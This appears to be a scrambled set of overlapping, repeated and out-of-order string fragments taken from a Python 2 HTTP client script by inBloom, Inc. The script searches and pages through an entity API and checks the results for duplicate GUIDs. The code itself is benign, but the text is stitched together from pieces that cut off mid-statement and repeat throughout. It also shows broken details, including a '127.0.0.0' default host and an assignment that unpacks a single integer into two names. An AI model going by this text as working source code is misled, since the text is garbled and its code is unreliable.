self.errors.append(\"Failed to connect to server at host", "None def search_iter(self,q,opts={},pagesize=10): opts['format'] = 'json' lq = copy.deepcopy(q) lq['limit'] = pagesize r", "json.loads(sys.argv[2]) print \"QUERY:\\n\",json.dumps(q,indent=4,sort_keys=True) if len(sys.argv) > 3: pagesize = sys.argv[3] else: pagesize,pagesize =", "import json,sys,httplib2,urllib,yaml,traceback,copy,base64,zlib def parse_cursor(s): return(json.loads(zlib.decompress(base64.urlsafe_b64decode(s.encode('utf-8'))))) class client(object): def __init__(self,host='127.0.0.0',port=8000,verbose=False): self.headers={} self.host=host self.port=port self.verbose=verbose", "pagesize r = self.query('POST','entity/search',lq,opts) hits = [] if r.get('response'): hits.extend(r['response']) find_dupes(hits) while r.get('cursor'):", "software # distributed under the License is distributed on an \"AS IS\" BASIS,", "cont if not opts.has_key(\"format\") or opts[\"format\"] == \"json\": j=json.loads(cont) return j elif opts.has_key(\"format\"):", "\"ITER CURSOR:\",r['cursor'][0:60] #print \"DECODED CURSOR:\",json.dumps(parse_cursor(r['cursor']),indent=4,sort_keys=True) lq = {\"cursor\":r['cursor'],\"limit\":pagesize} r = self.query('POST','entity/search',lq,opts) if r.get('response'):", "'GET', args[0], args[1], args[2] uq=urllib.urlencode({\"q\":json.dumps(q)}) uopts=urllib.urlencode({\"opts\":json.dumps(opts)}) if httpmode == 'GET': url='http://'+self.host+':'+str(self.port)+'/'+command+'?'+uq+'&'+uopts resp,cont=self.conn.request(url,method='GET',headers=self.headers) elif", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to", "client(object): def __init__(self,host='127.0.0.0',port=8000,verbose=False): self.headers={} self.host=host self.port=port self.verbose=verbose self.errors = [] self.connect() def connect(self):", "affiliates. # # Licensed under the Apache License, Version 2.0 (the \"License\"); #", "== 'POST': url='http://'+self.host+':'+str(self.port)+'/'+command resp,cont=self.conn.request(url,method='POST',headers=self.headers,body='?'+uq+'&'+uopts) else: print \"BAD HTTP MODE:\",httpmode return None if self.verbose:", "sys.argv[3] else: pagesize,pagesize = 10 response = c.search_iter(q,pagesize=pagesize) print json.dumps(response,indent=4,sort_keys=True) \"\"\" Usage examples:\\n", "query(self,httpmode,command,q,opts,parse=True): def query(self, *args, **kwargs): if not kwargs: parse = True else: parse", "None if self.verbose: print \"REQUEST URL =\",url if resp.status==200: if not parse: return", "under the License. import json,sys,httplib2,urllib,yaml,traceback,copy,base64,zlib def parse_cursor(s): return(json.loads(zlib.decompress(base64.urlsafe_b64decode(s.encode('utf-8'))))) class client(object): def __init__(self,host='127.0.0.0',port=8000,verbose=False): self.headers={}", "c.search_iter(q,pagesize=pagesize) print json.dumps(response,indent=4,sort_keys=True) \"\"\" Usage examples:\\n ./client.py GET entity/search '{\"urn:lri:property_type:types\":\"urn:lri:entity_type:type\"}' '{\"details\":true}' ./client.py GET", "under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "specific language governing permissions and # limitations under the License. import json,sys,httplib2,urllib,yaml,traceback,copy,base64,zlib def", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "= copy.deepcopy(q) lq['limit'] = pagesize r = self.query('POST','entity/search',lq,opts) hits = [] if r.get('response'):", "License. import json,sys,httplib2,urllib,yaml,traceback,copy,base64,zlib def parse_cursor(s): return(json.loads(zlib.decompress(base64.urlsafe_b64decode(s.encode('utf-8'))))) class client(object): def __init__(self,host='127.0.0.0',port=8000,verbose=False): self.headers={} self.host=host self.port=port", "'POST': url='http://'+self.host+':'+str(self.port)+'/'+command resp,cont=self.conn.request(url,method='POST',headers=self.headers,body='?'+uq+'&'+uopts) else: print \"BAD HTTP MODE:\",httpmode return None if self.verbose: print", "class client(object): def __init__(self,host='127.0.0.0',port=8000,verbose=False): self.headers={} self.host=host self.port=port self.verbose=verbose self.errors = [] self.connect() def", "python # Copyright 2012-2013 inBloom, Inc. and its affiliates. # # Licensed under", "required by applicable law or agreed to in writing, software # distributed under", "r = self.query('POST','entity/search',lq,opts) if r.get('response'): hits.extend(r['response']) print \"TOTAL HITS:\",len(hits) find_dupes(hits) return hits def", "find_dupes(hits) while r.get('cursor'): #print \"ITER CURSOR:\",r['cursor'][0:60] #print \"DECODED CURSOR:\",json.dumps(parse_cursor(r['cursor']),indent=4,sort_keys=True) lq = {\"cursor\":r['cursor'],\"limit\":pagesize} r", "applicable law or agreed to in writing, software # distributed under the License", "governing permissions and # limitations under the License. import json,sys,httplib2,urllib,yaml,traceback,copy,base64,zlib def parse_cursor(s): return(json.loads(zlib.decompress(base64.urlsafe_b64decode(s.encode('utf-8')))))", "if len(sys.argv) > 3: pagesize = sys.argv[3] else: pagesize,pagesize = 10 response =", "resp.status==200: if not parse: return cont if not opts.has_key(\"format\") or opts[\"format\"] == \"json\":", "j elif opts.has_key(\"format\"): if opts[\"format\"] == \"yaml\": return yaml.safe_load(cont) elif opts[\"format\"] in [\"xml\",\"oldxml\",\"johnxml\"]:", "\"TOTAL HITS:\",len(hits) find_dupes(hits) return hits def find_dupes(l): h = set() for hit in", "= set() for hit in l: i = hit['props']['urn:lri:property_type:guid'] if i in h:", "'{\"urn:lri:property_type:id\":\"MY_FQGUID\",\"urn:lri:property_type:types\":[\"urn:lri:entity_type:thing\"]}' ./client.py GET property/create '{\"from\":\"MY_ENTITY_GUID\",\"urn:lri:property_type:name\":\"THE NAME OF MY ENTITY\"}' ./client.py GET property/update '{\"guid\":\"MY_PROPERTY_GUID\",\"value\":\"MY", "copy.deepcopy(q) lq['limit'] = pagesize r = self.query('POST','entity/search',lq,opts) hits = [] if r.get('response'): hits.extend(r['response'])", "or agreed to in writing, software # distributed under the License is distributed", "r.get('cursor'): #print \"ITER CURSOR:\",r['cursor'][0:60] #print \"DECODED CURSOR:\",json.dumps(parse_cursor(r['cursor']),indent=4,sort_keys=True) lq = {\"cursor\":r['cursor'],\"limit\":pagesize} r = self.query('POST','entity/search',lq,opts)", "CONDITIONS OF ANY KIND, either express or implied. # See the License for", "opts[\"format\"] == \"yaml\": return yaml.safe_load(cont) elif opts[\"format\"] in [\"xml\",\"oldxml\",\"johnxml\"]: return cont else: print", "len(sys.argv) > 3: pagesize = sys.argv[3] else: pagesize,pagesize = 10 response = c.search_iter(q,pagesize=pagesize)", "under the Apache License, Version 2.0 (the \"License\"); # you may not use", "writing, software # distributed under the License is distributed on an \"AS IS\"", "and its affiliates. # # Licensed under the Apache License, Version 2.0 (the", "'{\"details\":true}' ./client.py GET entity/create '{\"urn:lri:property_type:id\":\"MY_FQGUID\",\"urn:lri:property_type:types\":[\"urn:lri:entity_type:thing\"]}' ./client.py GET property/create '{\"from\":\"MY_ENTITY_GUID\",\"urn:lri:property_type:name\":\"THE NAME OF MY ENTITY\"}'", "You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "%s port %s.\" % (self.host,self.port)) if self.verbose: print self.errors[-1] #def query(self,httpmode,command,q,opts,parse=True): def query(self,", "License. # You may obtain a copy of the License at # #", "url='http://'+self.host+':'+str(self.port)+'/'+command resp,cont=self.conn.request(url,method='POST',headers=self.headers,body='?'+uq+'&'+uopts) else: print \"BAD HTTP MODE:\",httpmode return None if self.verbose: print \"REQUEST", "in l: i = hit['props']['urn:lri:property_type:guid'] if i in h: print \"DUPLICATE! \",i h.add(i)", "h.add(i) #print \"TOTAL SET:\",json.dumps(sorted(list(h)),indent=4) if __name__=='__main__': h,p = sys.argv[1].split(\":\") c=client(host=h,port=int(p)) q = json.loads(sys.argv[2])", "\"REQUEST URL =\",url if resp.status==200: if not parse: return cont if not opts.has_key(\"format\")", "HTTP MODE:\",httpmode return None if self.verbose: print \"REQUEST URL =\",url if resp.status==200: if", "compliance with the License. # You may obtain a copy of the License", "l: i = hit['props']['urn:lri:property_type:guid'] if i in h: print \"DUPLICATE! \",i h.add(i) #print", "for the specific language governing permissions and # limitations under the License. import", "print \"QUERY:\\n\",json.dumps(q,indent=4,sort_keys=True) if len(sys.argv) > 3: pagesize = sys.argv[3] else: pagesize,pagesize = 10", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "resp,cont=self.conn.request(url,method='POST',headers=self.headers,body='?'+uq+'&'+uopts) else: print \"BAD HTTP MODE:\",httpmode return None if self.verbose: print \"REQUEST URL", "opts[\"format\"] in [\"xml\",\"oldxml\",\"johnxml\"]: return cont else: print resp,cont return None def search_iter(self,q,opts={},pagesize=10): opts['format']", "resp,cont return None def search_iter(self,q,opts={},pagesize=10): opts['format'] = 'json' lq = copy.deepcopy(q) lq['limit'] =", "if len(args) == 4: httpmode, command, q, opts = args[0:4] elif len(args) ==", "10 response = c.search_iter(q,pagesize=pagesize) print json.dumps(response,indent=4,sort_keys=True) \"\"\" Usage examples:\\n ./client.py GET entity/search '{\"urn:lri:property_type:types\":\"urn:lri:entity_type:type\"}'", "self.headers={} self.host=host self.port=port self.verbose=verbose self.errors = [] self.connect() def connect(self): try: self.conn=httplib2.Http() except:", "kwargs: parse = True else: parse = kwargs['parse'] if len(args) == 4: httpmode,", "if httpmode == 'GET': url='http://'+self.host+':'+str(self.port)+'/'+command+'?'+uq+'&'+uopts resp,cont=self.conn.request(url,method='GET',headers=self.headers) elif httpmode == 'POST': url='http://'+self.host+':'+str(self.port)+'/'+command resp,cont=self.conn.request(url,method='POST',headers=self.headers,body='?'+uq+'&'+uopts) else:", "= json.loads(sys.argv[2]) print \"QUERY:\\n\",json.dumps(q,indent=4,sort_keys=True) if len(sys.argv) > 3: pagesize = sys.argv[3] else: pagesize,pagesize", "not use this file except in compliance with the License. # You may", "lq['limit'] = pagesize r = self.query('POST','entity/search',lq,opts) hits = [] if r.get('response'): hits.extend(r['response']) find_dupes(hits)", "License, Version 2.0 (the \"License\"); # you may not use this file except", "args[0:4] elif len(args) == 3: httpmode, command, q, opts = 'GET', args[0], args[1],", "if not kwargs: parse = True else: parse = kwargs['parse'] if len(args) ==", "return cont else: print resp,cont return None def search_iter(self,q,opts={},pagesize=10): opts['format'] = 'json' lq", "self.errors[-1] #def query(self,httpmode,command,q,opts,parse=True): def query(self, *args, **kwargs): if not kwargs: parse = True", "search_iter(self,q,opts={},pagesize=10): opts['format'] = 'json' lq = copy.deepcopy(q) lq['limit'] = pagesize r = self.query('POST','entity/search',lq,opts)", "examples:\\n ./client.py GET entity/search '{\"urn:lri:property_type:types\":\"urn:lri:entity_type:type\"}' '{\"details\":true}' ./client.py GET entity/create '{\"urn:lri:property_type:id\":\"MY_FQGUID\",\"urn:lri:property_type:types\":[\"urn:lri:entity_type:thing\"]}' ./client.py GET property/create", "server at host %s port %s.\" % (self.host,self.port)) if self.verbose: print self.errors[-1] #def", "if self.verbose: print \"REQUEST URL =\",url if resp.status==200: if not parse: return cont", "> 3: pagesize = sys.argv[3] else: pagesize,pagesize = 10 response = c.search_iter(q,pagesize=pagesize) print", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "hit['props']['urn:lri:property_type:guid'] if i in h: print \"DUPLICATE! \",i h.add(i) #print \"TOTAL SET:\",json.dumps(sorted(list(h)),indent=4) if", "GET entity/search '{\"urn:lri:property_type:types\":\"urn:lri:entity_type:type\"}' '{\"details\":true}' ./client.py GET entity/create '{\"urn:lri:property_type:id\":\"MY_FQGUID\",\"urn:lri:property_type:types\":[\"urn:lri:entity_type:thing\"]}' ./client.py GET property/create '{\"from\":\"MY_ENTITY_GUID\",\"urn:lri:property_type:name\":\"THE NAME", "3: httpmode, command, q, opts = 'GET', args[0], args[1], args[2] uq=urllib.urlencode({\"q\":json.dumps(q)}) uopts=urllib.urlencode({\"opts\":json.dumps(opts)}) if", "args[2] uq=urllib.urlencode({\"q\":json.dumps(q)}) uopts=urllib.urlencode({\"opts\":json.dumps(opts)}) if httpmode == 'GET': url='http://'+self.host+':'+str(self.port)+'/'+command+'?'+uq+'&'+uopts resp,cont=self.conn.request(url,method='GET',headers=self.headers) elif httpmode == 'POST':", "== 'GET': url='http://'+self.host+':'+str(self.port)+'/'+command+'?'+uq+'&'+uopts resp,cont=self.conn.request(url,method='GET',headers=self.headers) elif httpmode == 'POST': url='http://'+self.host+':'+str(self.port)+'/'+command resp,cont=self.conn.request(url,method='POST',headers=self.headers,body='?'+uq+'&'+uopts) else: print \"BAD", "hits = [] if r.get('response'): hits.extend(r['response']) find_dupes(hits) while r.get('cursor'): #print \"ITER CURSOR:\",r['cursor'][0:60] #print", "[\"xml\",\"oldxml\",\"johnxml\"]: return cont else: print resp,cont return None def search_iter(self,q,opts={},pagesize=10): opts['format'] = 'json'", "3: pagesize = sys.argv[3] else: pagesize,pagesize = 10 response = c.search_iter(q,pagesize=pagesize) print json.dumps(response,indent=4,sort_keys=True)", "q, opts = 'GET', args[0], args[1], args[2] uq=urllib.urlencode({\"q\":json.dumps(q)}) uopts=urllib.urlencode({\"opts\":json.dumps(opts)}) if httpmode == 'GET':", "# you may not use this file except in compliance with the License.", "c=client(host=h,port=int(p)) q = json.loads(sys.argv[2]) print \"QUERY:\\n\",json.dumps(q,indent=4,sort_keys=True) if len(sys.argv) > 3: pagesize = sys.argv[3]", "= 10 response = c.search_iter(q,pagesize=pagesize) print json.dumps(response,indent=4,sort_keys=True) \"\"\" Usage examples:\\n ./client.py GET entity/search", "agreed to in writing, software # distributed under the License is distributed on", "% (self.host,self.port)) if self.verbose: print self.errors[-1] #def query(self,httpmode,command,q,opts,parse=True): def query(self, *args, **kwargs): if", "lq = {\"cursor\":r['cursor'],\"limit\":pagesize} r = self.query('POST','entity/search',lq,opts) if r.get('response'): hits.extend(r['response']) print \"TOTAL HITS:\",len(hits) find_dupes(hits)", "Usage examples:\\n ./client.py GET entity/search '{\"urn:lri:property_type:types\":\"urn:lri:entity_type:type\"}' '{\"details\":true}' ./client.py GET entity/create '{\"urn:lri:property_type:id\":\"MY_FQGUID\",\"urn:lri:property_type:types\":[\"urn:lri:entity_type:thing\"]}' ./client.py GET", "(the \"License\"); # you may not use this file except in compliance with", "#!/usr/bin/env python # Copyright 2012-2013 inBloom, Inc. and its affiliates. # # Licensed", "host %s port %s.\" % (self.host,self.port)) if self.verbose: print self.errors[-1] #def query(self,httpmode,command,q,opts,parse=True): def", "self.host=host self.port=port self.verbose=verbose self.errors = [] self.connect() def connect(self): try: self.conn=httplib2.Http() except: self.errors.append(\"Failed", "= c.search_iter(q,pagesize=pagesize) print json.dumps(response,indent=4,sort_keys=True) \"\"\" Usage examples:\\n ./client.py GET entity/search '{\"urn:lri:property_type:types\":\"urn:lri:entity_type:type\"}' '{\"details\":true}' ./client.py", "# Unless required by applicable law or agreed to in writing, software #", "\"\"\" Usage examples:\\n ./client.py GET entity/search '{\"urn:lri:property_type:types\":\"urn:lri:entity_type:type\"}' '{\"details\":true}' ./client.py GET entity/create '{\"urn:lri:property_type:id\":\"MY_FQGUID\",\"urn:lri:property_type:types\":[\"urn:lri:entity_type:thing\"]}' ./client.py", "by applicable law or agreed to in writing, software # distributed under the", "def parse_cursor(s): return(json.loads(zlib.decompress(base64.urlsafe_b64decode(s.encode('utf-8'))))) class client(object): def __init__(self,host='127.0.0.0',port=8000,verbose=False): self.headers={} self.host=host self.port=port self.verbose=verbose self.errors =", "self.errors.append(\"Failed to connect to server at host %s port %s.\" % (self.host,self.port)) if", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "not opts.has_key(\"format\") or opts[\"format\"] == \"json\": j=json.loads(cont) return j elif opts.has_key(\"format\"): if opts[\"format\"]", "property/create '{\"from\":\"MY_ENTITY_GUID\",\"urn:lri:property_type:name\":\"THE NAME OF MY ENTITY\"}' ./client.py GET property/update '{\"guid\":\"MY_PROPERTY_GUID\",\"value\":\"MY NEW NAME\"}' \"\"\"", "(self.host,self.port)) if self.verbose: print self.errors[-1] #def query(self,httpmode,command,q,opts,parse=True): def query(self, *args, **kwargs): if not", "elif opts[\"format\"] in [\"xml\",\"oldxml\",\"johnxml\"]: return cont else: print resp,cont return None def search_iter(self,q,opts={},pagesize=10):", "GET property/create '{\"from\":\"MY_ENTITY_GUID\",\"urn:lri:property_type:name\":\"THE NAME OF MY ENTITY\"}' ./client.py GET property/update '{\"guid\":\"MY_PROPERTY_GUID\",\"value\":\"MY NEW NAME\"}'", "url='http://'+self.host+':'+str(self.port)+'/'+command+'?'+uq+'&'+uopts resp,cont=self.conn.request(url,method='GET',headers=self.headers) elif httpmode == 'POST': url='http://'+self.host+':'+str(self.port)+'/'+command resp,cont=self.conn.request(url,method='POST',headers=self.headers,body='?'+uq+'&'+uopts) else: print \"BAD HTTP MODE:\",httpmode", "command, q, opts = 'GET', args[0], args[1], args[2] uq=urllib.urlencode({\"q\":json.dumps(q)}) uopts=urllib.urlencode({\"opts\":json.dumps(opts)}) if httpmode ==", "file except in compliance with the License. # You may obtain a copy", "self.verbose: print \"REQUEST URL =\",url if resp.status==200: if not parse: return cont if", "in [\"xml\",\"oldxml\",\"johnxml\"]: return cont else: print resp,cont return None def search_iter(self,q,opts={},pagesize=10): opts['format'] =", "response = c.search_iter(q,pagesize=pagesize) print json.dumps(response,indent=4,sort_keys=True) \"\"\" Usage examples:\\n ./client.py GET entity/search '{\"urn:lri:property_type:types\":\"urn:lri:entity_type:type\"}' '{\"details\":true}'", "License for the specific language governing permissions and # limitations under the License.", "not kwargs: parse = True else: parse = kwargs['parse'] if len(args) == 4:", "to in writing, software # distributed under the License is distributed on an", "print self.errors[-1] #def query(self,httpmode,command,q,opts,parse=True): def query(self, *args, **kwargs): if not kwargs: parse =", "implied. # See the License for the specific language governing permissions and #", "parse = True else: parse = kwargs['parse'] if len(args) == 4: httpmode, command,", "\"License\"); # you may not use this file except in compliance with the", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "HITS:\",len(hits) find_dupes(hits) return hits def find_dupes(l): h = set() for hit in l:", "r.get('response'): hits.extend(r['response']) find_dupes(hits) while r.get('cursor'): #print \"ITER CURSOR:\",r['cursor'][0:60] #print \"DECODED CURSOR:\",json.dumps(parse_cursor(r['cursor']),indent=4,sort_keys=True) lq =", "elif opts.has_key(\"format\"): if opts[\"format\"] == \"yaml\": return yaml.safe_load(cont) elif opts[\"format\"] in [\"xml\",\"oldxml\",\"johnxml\"]: return", "'{\"urn:lri:property_type:types\":\"urn:lri:entity_type:type\"}' '{\"details\":true}' ./client.py GET entity/create '{\"urn:lri:property_type:id\":\"MY_FQGUID\",\"urn:lri:property_type:types\":[\"urn:lri:entity_type:thing\"]}' ./client.py GET property/create '{\"from\":\"MY_ENTITY_GUID\",\"urn:lri:property_type:name\":\"THE NAME OF MY", "./client.py GET entity/search '{\"urn:lri:property_type:types\":\"urn:lri:entity_type:type\"}' '{\"details\":true}' ./client.py GET entity/create '{\"urn:lri:property_type:id\":\"MY_FQGUID\",\"urn:lri:property_type:types\":[\"urn:lri:entity_type:thing\"]}' ./client.py GET property/create '{\"from\":\"MY_ENTITY_GUID\",\"urn:lri:property_type:name\":\"THE", "h = set() for hit in l: i = hit['props']['urn:lri:property_type:guid'] if i in", "and # limitations under the License. import json,sys,httplib2,urllib,yaml,traceback,copy,base64,zlib def parse_cursor(s): return(json.loads(zlib.decompress(base64.urlsafe_b64decode(s.encode('utf-8'))))) class client(object):", "GET entity/create '{\"urn:lri:property_type:id\":\"MY_FQGUID\",\"urn:lri:property_type:types\":[\"urn:lri:entity_type:thing\"]}' ./client.py GET property/create '{\"from\":\"MY_ENTITY_GUID\",\"urn:lri:property_type:name\":\"THE NAME OF MY ENTITY\"}' ./client.py GET", "or implied. # See the License for the specific language governing permissions and", "Apache License, Version 2.0 (the \"License\"); # you may not use this file", "OR CONDITIONS OF ANY KIND, either express or implied. # See the License", "may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "while r.get('cursor'): #print \"ITER CURSOR:\",r['cursor'][0:60] #print \"DECODED CURSOR:\",json.dumps(parse_cursor(r['cursor']),indent=4,sort_keys=True) lq = {\"cursor\":r['cursor'],\"limit\":pagesize} r =", "args[1], args[2] uq=urllib.urlencode({\"q\":json.dumps(q)}) uopts=urllib.urlencode({\"opts\":json.dumps(opts)}) if httpmode == 'GET': url='http://'+self.host+':'+str(self.port)+'/'+command+'?'+uq+'&'+uopts resp,cont=self.conn.request(url,method='GET',headers=self.headers) elif httpmode ==", "q = json.loads(sys.argv[2]) print \"QUERY:\\n\",json.dumps(q,indent=4,sort_keys=True) if len(sys.argv) > 3: pagesize = sys.argv[3] else:", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,", "#print \"DECODED CURSOR:\",json.dumps(parse_cursor(r['cursor']),indent=4,sort_keys=True) lq = {\"cursor\":r['cursor'],\"limit\":pagesize} r = self.query('POST','entity/search',lq,opts) if r.get('response'): hits.extend(r['response']) print", "in writing, software # distributed under the License is distributed on an \"AS", "permissions and # limitations under the License. import json,sys,httplib2,urllib,yaml,traceback,copy,base64,zlib def parse_cursor(s): return(json.loads(zlib.decompress(base64.urlsafe_b64decode(s.encode('utf-8'))))) class", "= sys.argv[1].split(\":\") c=client(host=h,port=int(p)) q = json.loads(sys.argv[2]) print \"QUERY:\\n\",json.dumps(q,indent=4,sort_keys=True) if len(sys.argv) > 3: pagesize", "# See the License for the specific language governing permissions and # limitations", "the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "def __init__(self,host='127.0.0.0',port=8000,verbose=False): self.headers={} self.host=host self.port=port self.verbose=verbose self.errors = [] self.connect() def connect(self): try:", "hits.extend(r['response']) print \"TOTAL HITS:\",len(hits) find_dupes(hits) return hits def find_dupes(l): h = set() for", "inBloom, Inc. and its affiliates. # # Licensed under the Apache License, Version", "hit in l: i = hit['props']['urn:lri:property_type:guid'] if i in h: print \"DUPLICATE! \",i", "connect(self): try: self.conn=httplib2.Http() except: self.errors.append(\"Failed to connect to server at host %s port", "opts.has_key(\"format\") or opts[\"format\"] == \"json\": j=json.loads(cont) return j elif opts.has_key(\"format\"): if opts[\"format\"] ==", "= hit['props']['urn:lri:property_type:guid'] if i in h: print \"DUPLICATE! \",i h.add(i) #print \"TOTAL SET:\",json.dumps(sorted(list(h)),indent=4)", "httpmode == 'POST': url='http://'+self.host+':'+str(self.port)+'/'+command resp,cont=self.conn.request(url,method='POST',headers=self.headers,body='?'+uq+'&'+uopts) else: print \"BAD HTTP MODE:\",httpmode return None if", "the Apache License, Version 2.0 (the \"License\"); # you may not use this", "you may not use this file except in compliance with the License. #", "the License. import json,sys,httplib2,urllib,yaml,traceback,copy,base64,zlib def parse_cursor(s): return(json.loads(zlib.decompress(base64.urlsafe_b64decode(s.encode('utf-8'))))) class client(object): def __init__(self,host='127.0.0.0',port=8000,verbose=False): self.headers={} self.host=host", "parse = kwargs['parse'] if len(args) == 4: httpmode, command, q, opts = args[0:4]", "<filename>client.py #!/usr/bin/env python # Copyright 2012-2013 inBloom, Inc. and its affiliates. # #", "query(self, *args, **kwargs): if not kwargs: parse = True else: parse = kwargs['parse']", "2012-2013 inBloom, Inc. and its affiliates. # # Licensed under the Apache License,", "#print \"ITER CURSOR:\",r['cursor'][0:60] #print \"DECODED CURSOR:\",json.dumps(parse_cursor(r['cursor']),indent=4,sort_keys=True) lq = {\"cursor\":r['cursor'],\"limit\":pagesize} r = self.query('POST','entity/search',lq,opts) if", "Inc. and its affiliates. # # Licensed under the Apache License, Version 2.0", "else: print \"BAD HTTP MODE:\",httpmode return None if self.verbose: print \"REQUEST URL =\",url", "use this file except in compliance with the License. # You may obtain", "else: print resp,cont return None def search_iter(self,q,opts={},pagesize=10): opts['format'] = 'json' lq = copy.deepcopy(q)", "== \"json\": j=json.loads(cont) return j elif opts.has_key(\"format\"): if opts[\"format\"] == \"yaml\": return yaml.safe_load(cont)", "lq = copy.deepcopy(q) lq['limit'] = pagesize r = self.query('POST','entity/search',lq,opts) hits = [] if", "*args, **kwargs): if not kwargs: parse = True else: parse = kwargs['parse'] if", "#def query(self,httpmode,command,q,opts,parse=True): def query(self, *args, **kwargs): if not kwargs: parse = True else:", "hits.extend(r['response']) find_dupes(hits) while r.get('cursor'): #print \"ITER CURSOR:\",r['cursor'][0:60] #print \"DECODED CURSOR:\",json.dumps(parse_cursor(r['cursor']),indent=4,sort_keys=True) lq = {\"cursor\":r['cursor'],\"limit\":pagesize}", "# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may", "parse_cursor(s): return(json.loads(zlib.decompress(base64.urlsafe_b64decode(s.encode('utf-8'))))) class client(object): def __init__(self,host='127.0.0.0',port=8000,verbose=False): self.headers={} self.host=host self.port=port self.verbose=verbose self.errors = []", "\"yaml\": return yaml.safe_load(cont) elif opts[\"format\"] in [\"xml\",\"oldxml\",\"johnxml\"]: return cont else: print resp,cont return", "self.conn=httplib2.Http() except: self.errors.append(\"Failed to connect to server at host %s port %s.\" %", "URL =\",url if resp.status==200: if not parse: return cont if not opts.has_key(\"format\") or", "2.0 (the \"License\"); # you may not use this file except in compliance", "r.get('response'): hits.extend(r['response']) print \"TOTAL HITS:\",len(hits) find_dupes(hits) return hits def find_dupes(l): h = set()", "for hit in l: i = hit['props']['urn:lri:property_type:guid'] if i in h: print \"DUPLICATE!", "\"BAD HTTP MODE:\",httpmode return None if self.verbose: print \"REQUEST URL =\",url if resp.status==200:", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the", "if not opts.has_key(\"format\") or opts[\"format\"] == \"json\": j=json.loads(cont) return j elif opts.has_key(\"format\"): if", "except: self.errors.append(\"Failed to connect to server at host %s port %s.\" % (self.host,self.port))", "json.dumps(response,indent=4,sort_keys=True) \"\"\" Usage examples:\\n ./client.py GET entity/search '{\"urn:lri:property_type:types\":\"urn:lri:entity_type:type\"}' '{\"details\":true}' ./client.py GET entity/create '{\"urn:lri:property_type:id\":\"MY_FQGUID\",\"urn:lri:property_type:types\":[\"urn:lri:entity_type:thing\"]}'", "== 3: httpmode, command, q, opts = 'GET', args[0], args[1], args[2] uq=urllib.urlencode({\"q\":json.dumps(q)}) uopts=urllib.urlencode({\"opts\":json.dumps(opts)})", "h,p = sys.argv[1].split(\":\") c=client(host=h,port=int(p)) q = json.loads(sys.argv[2]) print \"QUERY:\\n\",json.dumps(q,indent=4,sort_keys=True) if len(sys.argv) > 3:", "= self.query('POST','entity/search',lq,opts) hits = [] if r.get('response'): hits.extend(r['response']) find_dupes(hits) while r.get('cursor'): #print \"ITER", "j=json.loads(cont) return j elif opts.has_key(\"format\"): if opts[\"format\"] == \"yaml\": return yaml.safe_load(cont) elif opts[\"format\"]", "# # Unless required by applicable law or agreed to in writing, software", "resp,cont=self.conn.request(url,method='GET',headers=self.headers) elif httpmode == 'POST': url='http://'+self.host+':'+str(self.port)+'/'+command resp,cont=self.conn.request(url,method='POST',headers=self.headers,body='?'+uq+'&'+uopts) else: print \"BAD HTTP MODE:\",httpmode return", "\"json\": j=json.loads(cont) return j elif opts.has_key(\"format\"): if opts[\"format\"] == \"yaml\": return yaml.safe_load(cont) elif", "express or implied. # See the License for the specific language governing permissions", "args[0], args[1], args[2] uq=urllib.urlencode({\"q\":json.dumps(q)}) uopts=urllib.urlencode({\"opts\":json.dumps(opts)}) if httpmode == 'GET': url='http://'+self.host+':'+str(self.port)+'/'+command+'?'+uq+'&'+uopts resp,cont=self.conn.request(url,method='GET',headers=self.headers) elif httpmode", "def query(self, *args, **kwargs): if not kwargs: parse = True else: parse =", "to server at host %s port %s.\" % (self.host,self.port)) if self.verbose: print self.errors[-1]", "find_dupes(l): h = set() for hit in l: i = hit['props']['urn:lri:property_type:guid'] if i", "= kwargs['parse'] if len(args) == 4: httpmode, command, q, opts = args[0:4] elif", "either express or implied. # See the License for the specific language governing", "**kwargs): if not kwargs: parse = True else: parse = kwargs['parse'] if len(args)", "= pagesize r = self.query('POST','entity/search',lq,opts) hits = [] if r.get('response'): hits.extend(r['response']) find_dupes(hits) while", "yaml.safe_load(cont) elif opts[\"format\"] in [\"xml\",\"oldxml\",\"johnxml\"]: return cont else: print resp,cont return None def", "=\",url if resp.status==200: if not parse: return cont if not opts.has_key(\"format\") or opts[\"format\"]", "Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "self.query('POST','entity/search',lq,opts) if r.get('response'): hits.extend(r['response']) print \"TOTAL HITS:\",len(hits) find_dupes(hits) return hits def find_dupes(l): h", "return(json.loads(zlib.decompress(base64.urlsafe_b64decode(s.encode('utf-8'))))) class client(object): def __init__(self,host='127.0.0.0',port=8000,verbose=False): self.headers={} self.host=host self.port=port self.verbose=verbose self.errors = [] self.connect()", "\"QUERY:\\n\",json.dumps(q,indent=4,sort_keys=True) if len(sys.argv) > 3: pagesize = sys.argv[3] else: pagesize,pagesize = 10 response", "else: parse = kwargs['parse'] if len(args) == 4: httpmode, command, q, opts =", "uq=urllib.urlencode({\"q\":json.dumps(q)}) uopts=urllib.urlencode({\"opts\":json.dumps(opts)}) if httpmode == 'GET': url='http://'+self.host+':'+str(self.port)+'/'+command+'?'+uq+'&'+uopts resp,cont=self.conn.request(url,method='GET',headers=self.headers) elif httpmode == 'POST': url='http://'+self.host+':'+str(self.port)+'/'+command", "the License. # You may obtain a copy of the License at #", "httpmode, command, q, opts = 'GET', args[0], args[1], args[2] uq=urllib.urlencode({\"q\":json.dumps(q)}) uopts=urllib.urlencode({\"opts\":json.dumps(opts)}) if httpmode", "# distributed under the License is distributed on an \"AS IS\" BASIS, #", "entity/create 